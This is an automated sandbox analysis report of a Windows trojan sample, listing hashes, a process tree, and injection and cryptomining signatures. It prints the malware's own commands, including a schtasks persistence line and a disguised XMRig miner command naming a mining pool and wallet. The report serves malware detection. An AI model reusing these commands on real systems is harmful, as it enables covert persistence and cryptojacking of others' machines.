Analysis
-
max time kernel
150s -
max time network
195s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
14-10-2021 08:52
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe
Resource
win7v20210408
General
-
Target
SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe
-
Size
5.3MB
-
MD5
f8d8071d3e0163eb4e816ec49d0b2e8e
-
SHA1
a71da7648e0ee019d1594b583df94f4c6b7fae6c
-
SHA256
40387bebfe97eea9c90425caf5519019dfc0e7425bb238246ec9f7bb5d621293
-
SHA512
23dd39d2d4906779a44db6aa112c0a7317004664753facfe19233bb742f84ae8c039c0dbe26d85f16a46dd2cd1e97cc1b594dfa23f7cf3deb0dac5eeed10dabf
Malware Config
Signatures
-
XMRig Miner Payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/1372-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1372-87-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1372-92-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1372-89-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1372-93-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1372-94-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1372-95-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1372-96-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1372-97-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1372-98-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1372-99-0x000000014030F3F8-mapping.dmp xmrig behavioral1/memory/1372-101-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
Processes:
services64.exesihost64.exepid process 2024 services64.exe 1964 sihost64.exe -
Loads dropped DLL 3 IoCs
Processes:
cmd.execonhost.exepid process 1640 cmd.exe 1744 conhost.exe 1744 conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 1744 set thread context of 1372 1744 conhost.exe conhost.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
conhost.execonhost.execonhost.exepid process 844 conhost.exe 1744 conhost.exe 1744 conhost.exe 1372 conhost.exe 1372 conhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
conhost.execonhost.execonhost.exedescription pid process Token: SeDebugPrivilege 844 conhost.exe Token: SeDebugPrivilege 1744 conhost.exe Token: SeLockMemoryPrivilege 1372 conhost.exe Token: SeLockMemoryPrivilege 1372 conhost.exe -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
SecuriteInfo.com.Trojan.InjectNET.14.313.1568.execonhost.execmd.execmd.exeservices64.execonhost.exedescription pid process target process PID 1984 wrote to memory of 844 1984 SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe conhost.exe PID 1984 wrote to memory of 844 1984 SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe conhost.exe PID 1984 wrote to memory of 844 1984 SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe conhost.exe PID 1984 wrote to memory of 844 1984 SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe conhost.exe PID 844 wrote to memory of 1260 844 conhost.exe cmd.exe PID 844 wrote to memory of 1260 844 conhost.exe cmd.exe PID 844 wrote to memory of 1260 844 conhost.exe cmd.exe PID 1260 wrote to memory of 1020 1260 cmd.exe schtasks.exe PID 1260 wrote to memory of 1020 1260 cmd.exe schtasks.exe PID 1260 wrote to memory of 1020 1260 cmd.exe schtasks.exe PID 844 wrote to memory of 1640 844 conhost.exe cmd.exe PID 844 wrote to memory of 1640 844 conhost.exe cmd.exe PID 844 wrote to memory of 1640 844 conhost.exe cmd.exe PID 1640 wrote to memory of 2024 1640 cmd.exe services64.exe PID 1640 wrote to memory of 2024 1640 cmd.exe services64.exe PID 1640 wrote to memory of 2024 1640 cmd.exe services64.exe PID 2024 wrote to memory of 1744 2024 services64.exe conhost.exe PID 2024 wrote to memory of 1744 2024 services64.exe conhost.exe PID 2024 wrote to memory of 1744 2024 services64.exe conhost.exe PID 2024 wrote to memory of 1744 2024 services64.exe conhost.exe PID 1744 wrote to memory of 1964 1744 conhost.exe sihost64.exe PID 1744 wrote to memory of 1964 1744 conhost.exe sihost64.exe PID 1744 wrote to memory of 1964 1744 conhost.exe sihost64.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe PID 1744 wrote to memory of 1372 1744 conhost.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\services64.exeC:\Users\Admin\AppData\Local\Temp\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45JpPqakEn7EwqkL6WB28DLDt58UcCNARMdsAGo6VGdfUByVDFtFCxrNBD7UhWSNvGQCjvLgahxNrMc3T7szAVfj2JW7Kyq --pass=666 --cpu-max-threads-hint=90 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-kill-targets="" --cinit-idle-wait=5 --cinit-idle-cpu=50 --cinit-stealth --cinit-kill6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\services64.exeMD5
f8d8071d3e0163eb4e816ec49d0b2e8e
SHA1a71da7648e0ee019d1594b583df94f4c6b7fae6c
SHA25640387bebfe97eea9c90425caf5519019dfc0e7425bb238246ec9f7bb5d621293
SHA51223dd39d2d4906779a44db6aa112c0a7317004664753facfe19233bb742f84ae8c039c0dbe26d85f16a46dd2cd1e97cc1b594dfa23f7cf3deb0dac5eeed10dabf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
1f88c4258f73d6b14dcb92dd6cc68d11
SHA1fdcfdee8671895974de7a615886f2c2fa926289d
SHA25699e6f9f570f7d401de9fd417595adeabe4a0a5d4a9093e51c99437596e1fb2d1
SHA512a235d17555a352492f7ffc8308c1a8ff89da0475bd6ef0dc8799f59887986056eae0a1a720c2b2f5d5a418e0eba9d31027fd10d60f4f598eae08a4e5e7459f77
-
\Users\Admin\AppData\Local\Temp\services64.exeMD5
f8d8071d3e0163eb4e816ec49d0b2e8e
SHA1a71da7648e0ee019d1594b583df94f4c6b7fae6c
SHA25640387bebfe97eea9c90425caf5519019dfc0e7425bb238246ec9f7bb5d621293
SHA51223dd39d2d4906779a44db6aa112c0a7317004664753facfe19233bb742f84ae8c039c0dbe26d85f16a46dd2cd1e97cc1b594dfa23f7cf3deb0dac5eeed10dabf
-
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
1f88c4258f73d6b14dcb92dd6cc68d11
SHA1fdcfdee8671895974de7a615886f2c2fa926289d
SHA25699e6f9f570f7d401de9fd417595adeabe4a0a5d4a9093e51c99437596e1fb2d1
SHA512a235d17555a352492f7ffc8308c1a8ff89da0475bd6ef0dc8799f59887986056eae0a1a720c2b2f5d5a418e0eba9d31027fd10d60f4f598eae08a4e5e7459f77
-
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
1f88c4258f73d6b14dcb92dd6cc68d11
SHA1fdcfdee8671895974de7a615886f2c2fa926289d
SHA25699e6f9f570f7d401de9fd417595adeabe4a0a5d4a9093e51c99437596e1fb2d1
SHA512a235d17555a352492f7ffc8308c1a8ff89da0475bd6ef0dc8799f59887986056eae0a1a720c2b2f5d5a418e0eba9d31027fd10d60f4f598eae08a4e5e7459f77
-
memory/844-67-0x000000001B0F4000-0x000000001B0F6000-memory.dmpFilesize
8KB
-
memory/844-66-0x000000001B0F2000-0x000000001B0F4000-memory.dmpFilesize
8KB
-
memory/844-68-0x000000001B0F6000-0x000000001B0F7000-memory.dmpFilesize
4KB
-
memory/844-69-0x000000001B0F7000-0x000000001B0F8000-memory.dmpFilesize
4KB
-
memory/844-62-0x000000001B390000-0x000000001B5AC000-memory.dmpFilesize
2.1MB
-
memory/844-61-0x00000000001C0000-0x00000000003E0000-memory.dmpFilesize
2.1MB
-
memory/1020-65-0x0000000000000000-mapping.dmp
-
memory/1260-64-0x0000000000000000-mapping.dmp
-
memory/1372-89-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-96-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-102-0x0000000000440000-0x0000000000460000-memory.dmpFilesize
128KB
-
memory/1372-101-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-100-0x0000000000120000-0x0000000000140000-memory.dmpFilesize
128KB
-
memory/1372-82-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-83-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-84-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-85-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-87-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-99-0x000000014030F3F8-mapping.dmp
-
memory/1372-98-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-92-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-97-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-95-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-94-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1372-93-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1640-70-0x0000000000000000-mapping.dmp
-
memory/1744-86-0x000000001B092000-0x000000001B094000-memory.dmpFilesize
8KB
-
memory/1744-91-0x000000001B097000-0x000000001B098000-memory.dmpFilesize
4KB
-
memory/1744-90-0x000000001B096000-0x000000001B097000-memory.dmpFilesize
4KB
-
memory/1744-88-0x000000001B094000-0x000000001B096000-memory.dmpFilesize
8KB
-
memory/1964-80-0x0000000000000000-mapping.dmp
-
memory/1984-59-0x0000000000400000-0x0000000000CD3000-memory.dmpFilesize
8.8MB
-
memory/2024-74-0x0000000000400000-0x0000000000CD3000-memory.dmpFilesize
8.8MB
-
memory/2024-72-0x0000000000000000-mapping.dmp